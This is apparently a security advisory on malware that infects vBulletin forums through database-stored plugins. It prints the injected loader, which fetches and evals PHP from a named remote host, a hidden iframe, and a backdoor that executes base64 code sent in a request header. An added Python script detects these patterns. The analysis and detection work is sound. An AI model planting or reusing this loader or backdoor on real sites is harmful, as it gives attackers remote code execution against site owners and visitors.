vBulletin Vulnerability and Malware Exploit

Technical Details
Unlike WordPress, Drupal, and Joomla, vBulletin stores templates and plugin content in the database, and it is exactly this characteristic that the malware exploits. The malware hides inside the database using the plugin system and injects code into the "global_start" hook, so it is called on every page request:

// Hard-coded remote hostname, with a raw IP as fallback
$d = 'front.adabeupdate.com'; $ip = '91.220.173.170';
ob_start();
// Fetch PHP from the remote host over HTTP; fall back to the IP if the domain fails
$datad = getdata('http://' . $d . '/ss?t=f&' . $str);
if ($datad === false) { $datad = getdata('http://' . $ip . '/ss?t=f&' . $str); }
// Execute whatever came back; if eval() fails, dump it into the page output instead
if (eval($datad) === false) { print $datad; }
// Capture the buffered output and hand it to the template hook so it is rendered on every page
$template_hook['forcehf'] = ob_get_contents();
ob_end_clean();

... where getdata() is just a wrapper around curl.
For instance, in the injected plugin code above, the host website retrieves data from "front.adabeupdate.com" and displays it to the end user, which lets the malware be injected into the forum pages and delivered to the site's visitors through iFrames.
Analysis of the attack
The manner in which vBulletin stores template and plugin content makes cleanup more complicated for webmasters, as they need to use phpMyAdmin or another database tool to find and remove such injections. The code used in the attack is generated remotely and changes very often, but follows a similar format: iFrames similar to the one below load content from a random domain on port 36 or 38.

<iframe src="httx://bv5g.gabparenting.com:36/hot.php" height="1" width="1" frameborder="0" style="visibility:hidden; position:absolute"></iframe>
Here's a list of some domains that have been used so far in this attack:
Another interesting aspect of this attack is a backdoor that is triggered by a custom header sent by the client (visible to PHP as HTTP_ECMDE in $_SERVER) instead of a POST or GET parameter. Whenever it finds that header, it base64-decodes the value and evals (executes) it:
// Backdoor: any request carrying an ECMDE header has its value decoded and executed as PHP
if ($_SERVER["HTTP_ECMDE"]) {
    eval(base64_decode($_SERVER["HTTP_ECMDE"]));
    return;
}
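As an added example (not code from the original article), the following Python checks cover both injection points described above: it scans exported rows of the vBulletin plugin table for PHP that combines eval() with base64 decoding, client-header input or a remote fetch, and it scans rendered page HTML for hidden 1x1 iframes pointing at a non-standard port. The column names pluginid, hookname and phpcode, the sample rows and the example.invalid domains are assumptions constructed for the demonstration.

```python
import re

# Indicators taken from the injected global_start plugin and the HTTP_ECMDE backdoor above.
PLUGIN_PATTERNS = {
    "eval": re.compile(r"\beval\s*\("),
    "base64_decode": re.compile(r"\bbase64_decode\s*\("),
    "client_header_exec": re.compile(r"\$_SERVER\[\s*['\"]HTTP_\w+['\"]\s*\]"),
    "remote_fetch": re.compile(r"\b(?:curl_init|file_get_contents|fsockopen)\s*\(|https?://"),
}
IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.I)
SRC_RE = re.compile(r"""src\s*=\s*["']?(?:https?|httx)://([^/:"'\s]+)(?::(\d+))?""", re.I)
HIDDEN_RE = re.compile(r"""visibility\s*:\s*hidden|display\s*:\s*none|(?:height|width)\s*=\s*["']?[01]["'\s>]""", re.I)

def scan_plugins(rows):
    """Flag rows (dicts with pluginid/hookname/phpcode, assumed plugin-table columns) mixing eval() with decoding, header input or a remote fetch."""
    findings = []
    for row in rows:
        hits = {name for name, rx in PLUGIN_PATTERNS.items() if rx.search(row["phpcode"])}
        if "eval" in hits and hits & {"base64_decode", "client_header_exec", "remote_fetch"}:
            findings.append((row["pluginid"], row["hookname"], sorted(hits)))
    return findings

def find_injected_iframes(html):
    """Return (host, port) for iframes that are hidden or 1x1 and point at a non-standard port."""
    found = []
    for tag in IFRAME_RE.findall(html):
        m = SRC_RE.search(tag)
        if not m:
            continue
        port = int(m.group(2)) if m.group(2) else None
        if port not in (None, 80, 443) and HIDDEN_RE.search(tag):
            found.append((m.group(1), port))
    return found

# Constructed samples: a benign plugin, the injected loader and the header backdoor with placeholder domains, and a page with one injected and one normal iframe.
SAMPLE_PLUGINS = [
    {"pluginid": 1, "hookname": "global_start", "phpcode": "$vbulletin->options['x'] = 1;"},
    {"pluginid": 2, "hookname": "global_start", "phpcode":
        "$d = 'front.example.invalid'; ob_start();\n"
        "$datad = getdata('http://' . $d . '/ss?t=f&' . $str);\n"
        "if (eval($datad) === false) { print $datad; }\n"
        "$template_hook['forcehf'] = ob_get_contents(); ob_end_clean();"},
    {"pluginid": 3, "hookname": "init_startup", "phpcode":
        'if ($_SERVER["HTTP_ECMDE"]) { eval(base64_decode($_SERVER["HTTP_ECMDE"])); return; }'},
]
SAMPLE_HTML = (
    '<p>Forum home</p>'
    '<iframe src="http://bv5g.example.invalid:36/hot.php" height="1" width="1" frameborder="0" style="visibility:hidden; position:absolute"></iframe>'
    '<iframe src="https://video.example.invalid/embed/1" width="560" height="315"></iframe>'
)
```

Against a real site, feed scan_plugins() the rows of the plugin table (or the template table's contents, which the same patterns apply to) and find_injected_iframes() a fetched forum page.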
The full extent of the exploit is not yet clear; however, hundreds of websites have been reported affected, and Google has indexed more than 15,000 pages that display an error indicative of the attack.